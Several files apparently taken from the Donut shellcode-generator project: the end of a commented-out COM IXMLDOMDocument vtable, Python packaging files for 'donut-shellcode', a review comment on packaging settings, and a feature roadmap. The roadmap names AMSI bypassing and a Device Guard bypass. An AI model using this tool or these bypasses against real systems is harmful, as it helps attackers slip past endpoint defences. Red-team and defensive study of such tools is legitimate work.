377 IXMLDOMDocument * This,
378 IXMLDOMNode **definitionNode);
379
380 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
381 IXMLDOMDocument * This,
382 VARIANT *typedValue);
383
384 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
385 IXMLDOMDocument * This,
386 VARIANT typedValue);
387
388 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
389 IXMLDOMDocument * This,
390 VARIANT *dataTypeName);
391
392 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
393 IXMLDOMDocument * This,
394 BSTR dataTypeName);
395
396 HRESULT ( STDMETHODCALLTYPE *get_xml )(
397 IXMLDOMDocument * This,
398 BSTR *xmlString);
399
400 HRESULT ( STDMETHODCALLTYPE *transformNode )(
401 IXMLDOMDocument * This,
402 IXMLDOMNode *stylesheet,
403 BSTR *xmlString);
404
405 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
406 IXMLDOMDocument * This,
407 BSTR queryString,
408 IXMLDOMNodeList **resultList);
409
410 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
411 IXMLDOMDocument * This,
412 BSTR queryString,
413 IXMLDOMNode **resultNode);
414
415 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
416 IXMLDOMDocument * This,
417 VARIANT_BOOL *isParsed);
418
419 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
420 IXMLDOMDocument * This,
421 BSTR *namespaceURI);
422
423 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
424 IXMLDOMDocument * This,
425 BSTR *prefixString);
426
427 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
428 IXMLDOMDocument * This,
429 BSTR *nameString);
430
431 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
432 IXMLDOMDocument * This,
433 IXMLDOMNode *stylesheet,
434 VARIANT outputObject);
435
436 HRESULT ( STDMETHODCALLTYPE *get_doctype )(
437 IXMLDOMDocument * This,
438 IXMLDOMDocumentType **documentType);
439
440 HRESULT ( STDMETHODCALLTYPE *get_implementation )(
441 IXMLDOMDocument * This,
442 IXMLDOMImplementation **impl);
443
444 HRESULT ( STDMETHODCALLTYPE *get_documentElement )(
445 IXMLDOMDocument * This,
446 IXMLDOMElement **DOMElement);
447
448 HRESULT ( STDMETHODCALLTYPE *putref_documentElement )(
449 IXMLDOMDocument * This,
450 IXMLDOMElement *DOMElement);
451
452 HRESULT ( STDMETHODCALLTYPE *createElement )(
453 IXMLDOMDocument * This,
454 BSTR tagName,
455 IXMLDOMElement **element);
456
457 HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )(
458 IXMLDOMDocument * This,
459 IXMLDOMDocumentFragment **docFrag);
460
461 HRESULT ( STDMETHODCALLTYPE *createTextNode )(
462 IXMLDOMDocument * This,
463 BSTR data,
464 IXMLDOMText **text);
465
466 HRESULT ( STDMETHODCALLTYPE *createComment )(
467 IXMLDOMDocument * This,
468 BSTR data,
469 IXMLDOMComment **comment);
470
471 HRESULT ( STDMETHODCALLTYPE *createCDATASection )(
472 IXMLDOMDocument * This,
473 BSTR data,
474 IXMLDOMCDATASection **cdata);
475
476 HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )(
477 IXMLDOMDocument * This,
478 BSTR target,
479 BSTR data,
480 IXMLDOMProcessingInstruction **pi);
481
482 HRESULT ( STDMETHODCALLTYPE *createAttribute )(
483 IXMLDOMDocument * This,
484 BSTR name,
485 IXMLDOMAttribute **attribute);
486
487 HRESULT ( STDMETHODCALLTYPE *createEntityReference )(
488 IXMLDOMDocument * This,
489 BSTR name,
490 IXMLDOMEntityReference **entityRef);
491
492 HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )(
493 IXMLDOMDocument * This,
494 BSTR tagName,
495 IXMLDOMNodeList **resultList);
496
497 HRESULT ( STDMETHODCALLTYPE *createNode )(
498 IXMLDOMDocument * This,
499 VARIANT Type,
500 BSTR name,
501 BSTR namespaceURI,
502 IXMLDOMNode **node);
503
504 HRESULT ( STDMETHODCALLTYPE *nodeFromID )(
505 IXMLDOMDocument * This,
506 BSTR idString,
507 IXMLDOMNode **node);
508
509 HRESULT ( STDMETHODCALLTYPE *load )(
510 IXMLDOMDocument * This,
511 VARIANT xmlSource,
512 VARIANT_BOOL *isSuccessful);
513
514 HRESULT ( STDMETHODCALLTYPE *get_readyState )(
515 IXMLDOMDocument * This,
516 long *value);
517
518 HRESULT ( STDMETHODCALLTYPE *get_parseError )(
519 IXMLDOMDocument * This,
520 IXMLDOMParseError **errorObj);
521
522 HRESULT ( STDMETHODCALLTYPE *get_url )(
523 IXMLDOMDocument * This,
524 BSTR *urlString);
525
526 HRESULT ( STDMETHODCALLTYPE *get_async )(
527 IXMLDOMDocument * This,
528 VARIANT_BOOL *isAsync);
529
530 HRESULT ( STDMETHODCALLTYPE *put_async )(
531 IXMLDOMDocument * This,
532 VARIANT_BOOL isAsync);
533
534 HRESULT ( STDMETHODCALLTYPE *abort )(
535 IXMLDOMDocument * This);
536
537 HRESULT ( STDMETHODCALLTYPE *loadXML )(
538 IXMLDOMDocument * This,
539 BSTR bstrXML,
540 VARIANT_BOOL *isSuccessful);
541
542 HRESULT ( STDMETHODCALLTYPE *save )(
543 IXMLDOMDocument * This,
544 VARIANT destination);
545
546 HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )(
547 IXMLDOMDocument * This,
548 VARIANT_BOOL *isValidating);
549
550 HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )(
551 IXMLDOMDocument * This,
552 VARIANT_BOOL isValidating);
553
554 HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )(
555 IXMLDOMDocument * This,
556 VARIANT_BOOL *isResolving);
557
558 HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )(
559 IXMLDOMDocument * This,
560 VARIANT_BOOL isResolving);
561
562 HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )(
563 IXMLDOMDocument * This,
564 VARIANT_BOOL *isPreserving);
565
566 HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )(
567 IXMLDOMDocument * This,
568 VARIANT_BOOL isPreserving);
569
570 HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )(
571 IXMLDOMDocument * This,
572 VARIANT readystatechangeSink);
573
574 HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )(
575 IXMLDOMDocument * This,
576 VARIANT ondataavailableSink);
577
578 HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )(
579 IXMLDOMDocument * This,
580 VARIANT ontransformnodeSink);
581
582 END_INTERFACE
583 } IXMLDOMDocumentVtbl;
584
585 typedef struct _IXMLDOMDocument {
586 IXMLDOMDocumentVtbl *lpVtbl;
587 } XMLDomDocument;*/
0 [egg_info]
1 tag_build =
2 tag_date = 0
3
0 from setuptools import Extension, setup
1
2 with open("README.md", "r") as fh:
3 long_description = fh.read()
4
5 module = Extension(
6 "donut",
7 include_dirs=[
8 'include'
9 ],
10 sources=[
11 'donut.c',
12 'hash.c',
13 'encrypt.c',
14 'payload/clib.c',
15 'donutmodule.c'
16 ]
17 )
18
19 setup(
20 name='donut-shellcode',
21 version='0.9.2',
22 description='Donut Python C extension',
23 long_description=long_description,
24 long_description_content_type="text/markdown",
25 url='https://github.com/TheWover/donut',
26 author='TheWover, Odzhan, byt3bl33d3r',
27 include_package_data=True,
28 zip_safe=True,
29 ext_modules=[module],
30 python_requires='>=3.0',
31 )
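Review bot: `zip_safe=True` on line 28 is wrong for a package whose only content is the `donut` C extension; a compiled extension cannot be imported from a zipped egg, so this should be `zip_safe=False` (or omitted). Separately, `open("README.md", "r")` on line 2 uses the locale default encoding, which can fail on Windows if the README gains non-ASCII characters; `with open("README.md", "r", encoding="utf-8") as fh:` makes the build deterministic. Both are one-line changes inside an otherwise complete file section.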
0 * v0.9.1:
1 * Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
2 * Automatic detection of the CLR version required for .NET Assembly payloads.
3 * AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
4 * Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
5 * Bypass for Device Guard policy preventing execution of dynamically generated .NET code
6 * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
7 * v1.0:
8 * C# generator
9 * C# wrapper for our dynamic library
10 * Python generator
11 * Python wrapper for our dynamic library
12 * Better documentation for debugging, designing with, and integrating Donut.
13 * v1.1:
14 * Automatic unloading of Application Domains after the Assembly finishes executing.
15 * Support for HTTP proxies